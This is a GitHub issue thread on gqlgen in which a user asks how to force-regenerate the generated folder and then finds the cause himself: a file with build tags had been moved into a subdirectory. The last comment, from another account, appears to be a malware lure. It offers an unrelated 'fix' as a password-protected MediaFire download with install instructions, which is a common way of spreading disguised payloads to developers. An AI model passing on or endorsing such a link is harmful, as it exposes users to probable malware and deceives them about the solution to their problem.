### ISSUE TITLE
Is there a way to force-regenerate the `graph/generated` folder?

### ISSUE THREAD

**Issue by skyzyx** [99designs/gqlgen#3230]
> [!NOTE]
> TLDR: Is there a way to force `gqlgen` to re-generate the `generated` folder?

### What happened?

I got hit by https://github.com/99designs/gqlgen/issues/3222, and spent a week trying to fix my app. As part of this, I commented-out and/or deleted generated code and re-ran `gqlgen generate` to find a configuration that wouldn't panic.

### What did you expect?

I wiped-out my `graph/generated` folder with the expectation that re-running `gqlgen generate` would re-generate the directory and its code.

### Minimal graphql.schema and models to reproduce

N/A

### versions

```bash
$ go run -mod=mod github.com/99designs/gqlgen version
v0.17.49
```

```bash
$ go version
go version go1.23.0 darwin/arm64
```

**Comment by skyzyx** [comment]
Nevermind. I moved a file with `//go:build` statements into a subdirectory, so instead of generating in the original directory, it was generating in a subdirectory. :/

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
